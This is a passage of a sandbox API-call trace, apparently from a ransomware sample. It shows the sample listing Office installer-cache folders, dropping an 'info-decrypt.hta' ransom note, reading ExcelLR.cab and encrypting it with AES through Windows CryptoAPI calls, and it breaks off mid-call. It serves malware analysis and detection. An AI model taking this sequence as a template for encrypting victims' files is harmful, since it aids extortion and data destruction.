ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0131.517] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0131.517] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.517] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0131.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def8c) returned 1 [0131.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def98) returned 1 [0131.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69def7c) returned 1 [0131.518] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x69dea84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0131.518] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x69dea58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0131.518] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x69deca4 | out: lpFindFileData=0x69deca4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0133.880] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.881] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0133.881] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0133.881] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0133.881] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0133.881] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.881] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0133.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def3c) returned 1 [0133.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def48) returned 1 [0133.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69def7c) returned 1 [0133.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x69dea84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0133.882] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x69dea58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0133.882] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x69deca4 | out: lpFindFileData=0x69deca4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0133.882] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.882] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0133.882] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0133.882] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0133.882] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0133.883] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x69decb4 | out: lpFindFileData=0x69decb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0133.883] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0133.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def3c) returned 1 [0133.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def48) returned 1 [0136.553] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0136.553] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0136.553] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0136.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee9c) returned 1 [0136.553] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x69def18 | out: lpFileInformation=0x69def18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee98) returned 1 [0136.553] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0136.553] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69de8dc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0136.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dedd0) returned 1 [0136.553] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a8 [0136.876] GetFileType (hFile=0x3a8) returned 0x1 [0136.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dedcc) returned 1 [0136.876] GetFileType (hFile=0x3a8) returned 0x1 [0136.876] WriteFile (in: hFile=0x3a8, lpBuffer=0x3403a40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x69dee94, lpOverlapped=0x0 | out: lpBuffer=0x3403a40*, lpNumberOfBytesWritten=0x69dee94*=0x1000, lpOverlapped=0x0) returned 1 [0136.877] WriteFile (in: hFile=0x3a8, lpBuffer=0x3403a40*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x69dee68, lpOverlapped=0x0 | out: lpBuffer=0x3403a40*, lpNumberOfBytesWritten=0x69dee68*=0x557, lpOverlapped=0x0) returned 1 [0136.878] CloseHandle (hObject=0x3a8) returned 1 [0136.878] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x69de9b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0136.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee64) returned 1 [0136.878] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), fInfoLevelId=0x0, lpFileInformation=0x3404a5c | out: lpFileInformation=0x3404a5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb)) returned 1 [0137.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee60) returned 1 [0137.060] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x69de8a4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0137.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded98) returned 1 [0137.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8 [0137.060] GetFileType (hFile=0x3a8) returned 0x1 [0137.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded94) returned 1 [0137.060] GetFileType (hFile=0x3a8) returned 0x1 [0137.060] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x69deea0 | out: lpFileSizeHigh=0x69deea0*=0x0) returned 0x102fcbb [0139.164] ReadFile (in: hFile=0x3a8, lpBuffer=0x7431018, nNumberOfBytesToRead=0x102fcbb, lpNumberOfBytesRead=0x69dee4c, lpOverlapped=0x0 | out: lpBuffer=0x7431018*, lpNumberOfBytesRead=0x69dee4c*=0x102fcbb, lpOverlapped=0x0) returned 1 [0144.162] CloseHandle (hObject=0x3a8) returned 1 [0144.864] CryptAcquireContextW (in: phProv=0x69dedec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x69dedec*=0x6ee058) returned 1 [0144.878] CryptGenRandom (in: hProv=0x6ee058, dwLen=0x10, pbBuffer=0x343a5e8 | out: pbBuffer=0x343a5e8) returned 1 [0145.256] CryptImportKey (in: hProv=0x6ee058, pbData=0x3510678, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x69dedbc | out: phKey=0x69dedbc*=0x77b3f0) returned 1 [0145.256] CryptContextAddRef (hProv=0x6ee058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.256] CryptContextAddRef (hProv=0x6ee058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.256] CryptDuplicateKey (in: hKey=0x77b3f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x69dedac | out: phKey=0x69dedac*=0x77b430) returned 1 [0145.256] CryptContextAddRef (hProv=0x6ee058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.256] CryptSetKeyParam (hKey=0x77b430, dwParam=0x4, pbData=0x3510758*=0x1, dwFlags=0x0) returned 1 [0145.256] CryptSetKeyParam (hKey=0x77b430, dwParam=0x1, pbData=0x3510724, dwFlags=0x0) returned 1 [0147.854] CryptEncrypt (in: hKey=0x77b430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9a21018*, pdwDataLen=0x69dee18*=0x102fcc0, dwBufLen=0x102fcc0 | out: pbData=0x9a21018*, pdwDataLen=0x69dee18*=0x102fcc0) returned 1 [0148.623] CryptEncrypt (in: hKey=0x77b430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x340b980*, pdwDataLen=0x69dee20*=0x0, dwBufLen=0x10 | out: pbData=0x340b980*, pdwDataLen=0x69dee20*=0x10) returned 1 [0166.279] CryptDestroyKey (hKey=0x77b3f0) returned 1 [0166.279] CryptReleaseContext (hProv=0x6ee058, dwFlags=0x0) returned 1 [0166.279] CryptReleaseContext (hProv=0x6ee058, dwFlags=0x0) returned 1 [0166.279] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x69de890, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All 